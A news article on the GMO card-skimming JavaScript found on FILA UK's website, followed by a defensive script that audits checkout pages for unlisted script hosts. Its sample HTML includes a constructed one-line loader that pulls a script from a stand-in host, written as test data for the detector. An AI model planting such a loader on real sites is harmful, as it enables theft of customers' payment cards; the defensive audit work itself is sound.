
Hackers cop a FILA thousands of UK card deets after slinking onto clothing brand's servers

Pesky JavaScript harvester strikes again


Updated: Sportswear brand FILA is the latest outfit to fall victim to card-stealing JavaScript of the kind that menaced British Airways and Ticketmaster last year.

Russian security house Group-IB said it discovered and reported to FILA UK malware known as GMO that was active on the fashion brand's website for the past four months – and may have sniffed the payment card information of thousands of customers placing online orders through the tainted pages.

What's worse, the researchers reported that, despite multiple attempts to reach FILA, they have been unable to get the card-data-stealing code removed.

FILA did not respond to our request for comment on the allegation.

According to Group-IB's threat hunters, the GMO infection is very similar to the card-harvesting JavaScript nasty MageCart, in that an attacker slips onto the server of the targeted company and installs code on the business's website to covertly collect card numbers as customers enter them. These details are later uploaded to a collection server at a set time. Such attacks can be particularly difficult to detect as they do not produce a steady stream of traffic out of the infected machine.


In short, don't order anything from FILA online, and if you have, contact your bank and check your statements.

"One-line card stealing code downloads a JavaScript Sniffer once a customer lands on a checkout page, which intercepts credit card data and sends it to local storage. After, the payment cards' details are sent to the JS Sniffer's gate which is located on the same server as a JS Sniffer script itself," said Group-IB CTO Dmitry Volkov.

"Cybercriminals might have injected a malicious code by either exploiting a vulnerability of Magento CMS [content management system], used by FILA.co.uk, or simply by compromising the credentials of the website administrator using special spyware or cracking password with brute force methods," Volkov added.

Just how many customers could have fallen victim to the attack is difficult to say. Group-IB used a loose estimate based on monthly traffic figures and a one per cent conversion rate (ie, 1 per cent of people who visit the site end up buying something) to arrive at an estimated figure of around 5,600 compromised cards.

Group-IB said that FILA is likely not alone in falling victim to this latest variation of JavaScript malware harvesters. The researchers found six other unnamed websites to be similarly infected with the card-stealing scripts, and will be reaching out to US and UK police to help further suss out and stop any active infections. ®

Updated to add

Within hours of this article being published, the GMO JavaScript card sniffer was removed from FILA's website, Group-IB tells us.
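
For site owners, the one-line loader Volkov describes is something a routine audit of the checkout page can surface. The following is an added example, not Group-IB's tooling or code from the article: it lists the script loads in a page's HTML and flags hosts outside an allowlist, plus inline code that creates a script element at run time. The hostnames, allowlist and sample HTML are constructed, and the regex-based tag scan assumes ordinary, well-formed markup.

```javascript
// Added example, not from the article. Hostnames and HTML are constructed.
const SAMPLE_CHECKOUT_HTML = `
<script src="/static/js/checkout.js"></script>
<script src="https://payments.example/sdk.js"></script>
<script src="//cdn-stats.example.net/a.js"></script>
<script>var s=document.createElement('script');s.src='https://cdn-stats.example.net/l.js';document.head.appendChild(s);</script>
<script>window.cartTotal = 42;</script>`;

// Return findings for script loads on a checkout page that are outside the
// reviewed set: external hosts not on the allowlist, and inline code that
// creates a <script> element at run time (the shape of a one-line loader).
function auditCheckoutScripts(html, pageUrl, allowedHosts) {
  const allowed = new Set([new URL(pageUrl).hostname, ...allowedHosts]);
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const [, attrs, body] of html.matchAll(scriptTag)) {
    const src = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (src) {
      const raw = src[1] ?? src[2] ?? src[3];
      let host;
      try {
        host = new URL(raw, pageUrl).hostname; // handles relative and //host forms
      } catch {
        findings.push({ type: "unparseable-src", detail: raw });
        continue;
      }
      if (!allowed.has(host)) findings.push({ type: "unlisted-host", detail: host });
    } else if (/createElement\(\s*["']script["']\s*\)/i.test(body)) {
      // Heuristic: legitimate tag managers do this too, so each hit needs review.
      findings.push({ type: "inline-dynamic-loader", detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

console.log(auditCheckoutScripts(SAMPLE_CHECKOUT_HTML,
  "https://shop.example/checkout", ["payments.example"]));
```

Run against the rendered checkout HTML on a schedule, a finding that was absent from the previous run is the signal worth chasing.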
